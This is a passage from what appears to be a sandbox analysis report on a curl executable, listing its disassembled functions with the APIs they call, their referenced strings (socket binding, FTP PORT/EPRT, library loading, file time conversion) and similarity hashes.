                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$EncodePointer$HandleModule
                                                                                                                                                                    • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                                                                                                                                    • API String ID: 2375030495-2934716456
                                                                                                                                                                    • Opcode ID: 166a1834a0d2c7acf55e9c0ea7cf99e5cb101de2b897514276823343f0689d2d
                                                                                                                                                                    • Instruction ID: 6e35fa1b168c0e94a33f37897a21e217385ada6835dc876fd6e4783060a49efb
                                                                                                                                                                    • Opcode Fuzzy Hash: 166a1834a0d2c7acf55e9c0ea7cf99e5cb101de2b897514276823343f0689d2d
                                                                                                                                                                    • Instruction Fuzzy Hash: 16610C71861A18AACB02EF73AD59E17BBADBB56B00F01491BE001E7372DAF494118F52
                                                                                                                                                                    Function 00206800 Relevance: 75.7, APIs: 27, Strings: 16, Instructions: 439libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00205050: WSAStartup.WS2_32(00000002,?), ref: 0020506E
                                                                                                                                                                    • LoadLibraryA.KERNEL32(WS2_32.DLL), ref: 00206873
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00206881
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSACreateEvent), ref: 002068B7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 002068C1
                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 002068DD
                                                                                                                                                                    Strings
                                                                                                                                                                    • failed to find WSACreateEvent function (%d), xrefs: 002068C8
                                                                                                                                                                    • WSACloseEvent, xrefs: 002068FA
                                                                                                                                                                    • WS2_32.DLL, xrefs: 0020686E
                                                                                                                                                                    • FreeLibrary(wsock2) failed (%d), xrefs: 00206D62
                                                                                                                                                                    • failed to load WS2_32.DLL (%d), xrefs: 00206888
                                                                                                                                                                    • WSAEventSelect, xrefs: 00206946
                                                                                                                                                                    • Time-out, xrefs: 00206D13
                                                                                                                                                                    • , xrefs: 00206CBC
                                                                                                                                                                    • WSACloseEvent failed (%d), xrefs: 00206D3F
                                                                                                                                                                    • WSAEnumNetworkEvents failed (%d), xrefs: 00206C17
                                                                                                                                                                    • WSACreateEvent, xrefs: 002068B1
                                                                                                                                                                    • WSACreateEvent failed (%d), xrefs: 002069F3
                                                                                                                                                                    • failed to find WSACloseEvent function (%d), xrefs: 00206914
                                                                                                                                                                    • failed to find WSAEventSelect function (%d), xrefs: 00206960
                                                                                                                                                                    • WSAEnumNetworkEvents, xrefs: 00206992
                                                                                                                                                                    • failed to find WSAEnumNetworkEvents function (%d), xrefs: 002069AC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastLibrary$AddressFreeLoadProcStartup
                                                                                                                                                                    • String ID: $FreeLibrary(wsock2) failed (%d)$Time-out$WS2_32.DLL$WSACloseEvent$WSACloseEvent failed (%d)$WSACreateEvent$WSACreateEvent failed (%d)$WSAEnumNetworkEvents$WSAEnumNetworkEvents failed (%d)$WSAEventSelect$failed to find WSACloseEvent function (%d)$failed to find WSACreateEvent function (%d)$failed to find WSAEnumNetworkEvents function (%d)$failed to find WSAEventSelect function (%d)$failed to load WS2_32.DLL (%d)
                                                                                                                                                                    • API String ID: 2366007301-2939610961
                                                                                                                                                                    • Opcode ID: 6494bf8566f5050d14b58a6015bb10c1d3646fda5287781f7071800ce1bdb042
                                                                                                                                                                    • Instruction ID: 9ff2d7aa1aea89576a8d2330f348ceb03cdd1e5d659308b6b5da430a1875abc5
                                                                                                                                                                    • Opcode Fuzzy Hash: 6494bf8566f5050d14b58a6015bb10c1d3646fda5287781f7071800ce1bdb042
                                                                                                                                                                    • Instruction Fuzzy Hash: 07E1C271A553029BD710AF24EC4DBABBBE5EF88315F04052AF849D62E2D761CC64CB92
                                                                                                                                                                    Function 001FC810 Relevance: 51.3, APIs: 13, Strings: 16, Instructions: 585networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getsockname.WS2_32(?,?,?), ref: 001FCA39
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001FCA43
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001FCB3B
                                                                                                                                                                    • bind.WS2_32(?,?,?), ref: 001FCBBB
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001FCBC9
                                                                                                                                                                    • getsockname.WS2_32(?,?,00000080), ref: 001FCC15
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001FCC4C
                                                                                                                                                                    • closesocket.WS2_32(?), ref: 001FCC93
                                                                                                                                                                    • getsockname.WS2_32(?,?,?), ref: 001FCCEB
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001FCCF5
                                                                                                                                                                    • listen.WS2_32(?,00000001), ref: 001FCD27
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001FCD31
                                                                                                                                                                      • Part of subcall function 001D23B0: GetLastError.KERNEL32(?,00000000,?,001DD974), ref: 001D23B7
                                                                                                                                                                      • Part of subcall function 001D23B0: GetLastError.KERNEL32(?,?,?,?,001DD974), ref: 001D246B
                                                                                                                                                                      • Part of subcall function 001D23B0: SetLastError.KERNEL32(00000000,?,?,?,?,001DD974), ref: 001D2476
                                                                                                                                                                      • Part of subcall function 001DE530: closesocket.WS2_32(?), ref: 001DE55C
                                                                                                                                                                    • htons.WS2_32(?), ref: 001FCDF9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$getsockname$closesocket$bindhtonslisten
                                                                                                                                                                    • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$getsockname() failed: %s$getsockname() failed: %s$socket failure: %s$socket failure: %s
                                                                                                                                                                    • API String ID: 1927503704-1848652120
                                                                                                                                                                    • Opcode ID: 6530157adc7511f281d7271757a753e8499bbd424d76d804d877d61cafad654b
                                                                                                                                                                    • Instruction ID: b4e1facd5b9461383b78e49488919f467c219a39f30d7c244f23d4ca174f2a10
                                                                                                                                                                    • Opcode Fuzzy Hash: 6530157adc7511f281d7271757a753e8499bbd424d76d804d877d61cafad654b
                                                                                                                                                                    • Instruction Fuzzy Hash: A612257060834D9BC724EF24D945BBBBBE5AF94304F04051EF98687282EB75D905EBD2
                                                                                                                                                                    Function 002D0FB6 Relevance: 50.9, APIs: 22, Strings: 7, Instructions: 171libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00367940,00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D0FDE
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1004
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1010
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1026
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 002D103C
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D104B
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 002D1058
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D105F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 002D106C
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1073
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 002D1080
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1087
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 002D1098
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D109F
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D10A9
                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D10BB
                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D10D9
                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D10FB
                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1106
                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D114B
                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1163
                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,002CB6B9,00367940,Microsoft Visual C++ Runtime Library,00012010), ref: 002D1177
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$DecodeEncode$AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                    • String ID: @y6$GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                                                    • API String ID: 3166169540-118083679
                                                                                                                                                                    • Opcode ID: bab19ad71f1a36e00cb520a1b2971db71f9d102346bfbecda15e8a667f581438
                                                                                                                                                                    • Instruction ID: 3eefa572fa531f333c96a5886e748c84a068b57936bfd801a2af19fdfabdaef1
                                                                                                                                                                    • Opcode Fuzzy Hash: bab19ad71f1a36e00cb520a1b2971db71f9d102346bfbecda15e8a667f581438
                                                                                                                                                                    • Instruction Fuzzy Hash: 25519F71A61206FBCB219FB5DC48A6EBBBDAB49701F14451BE509E3350DB70CC62CBA4
                                                                                                                                                                    Function 001DD110 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 302networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: htons$bind$ErrorLastgetsockname
                                                                                                                                                                    • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                                                                                                                                                                    • API String ID: 3628919538-3110688763
                                                                                                                                                                    • Opcode ID: ddedd851494bb5ba865bb5c4a29379213e99d892303f2f592cfedc53a8c37501
                                                                                                                                                                    • Instruction ID: a680a7df4ff3d04d59e028ace394ab052e922341175e98ea611748ff7f326fab
                                                                                                                                                                    • Opcode Fuzzy Hash: ddedd851494bb5ba865bb5c4a29379213e99d892303f2f592cfedc53a8c37501
                                                                                                                                                                    • Instruction Fuzzy Hash: DFB1E6B4608341ABD724DF24E845BAB77E9EF99704F04492EF88987342E731D905CB93
                                                                                                                                                                    Function 002CCD06 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 337timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,?,?), ref: 002CCDC1
                                                                                                                                                                    • GetDriveTypeW.KERNEL32(00000000), ref: 002CCE28
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 002CCF5A
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002CCF72
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 002CCFEE
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002CD006
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 002CD082
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002CD09A
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CD0E9
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 002CD138
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CD149
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 002CD153
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CD161
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$System$FileFind$CloseLocalSpecific$ErrorLast$DriveFirstType
                                                                                                                                                                    • String ID: ./\
                                                                                                                                                                    • API String ID: 495382059-3176372042
                                                                                                                                                                    • Opcode ID: 9585653cdb38f5cb5f655fe32a760ab0523499deb8a1f14d42cf17de37da12d4
                                                                                                                                                                    • Instruction ID: f3ce8c3fd502079c24f09a683c0a256f343a0370da00a4bab23e11d3841bb71e
                                                                                                                                                                    • Opcode Fuzzy Hash: 9585653cdb38f5cb5f655fe32a760ab0523499deb8a1f14d42cf17de37da12d4
                                                                                                                                                                    • Instruction Fuzzy Hash: BEC1ADB18646299ECB309F64CC48BBAB7F8AF08311F1046AEF54DD2181E7749D91CF25
                                                                                                                                                                    Function 002CFCDD Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 331COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ./\
                                                                                                                                                                    • API String ID: 0-3176372042
                                                                                                                                                                    • Opcode ID: 9d48ea08cb4d3bf1c2da6e48e5bea191dbaf49720a974952d68796026bae9a3d
                                                                                                                                                                    • Instruction ID: ba1f1a299ca3969cfe866a9b11808378a72da5fbf6733692f6f91145d76ebe4c
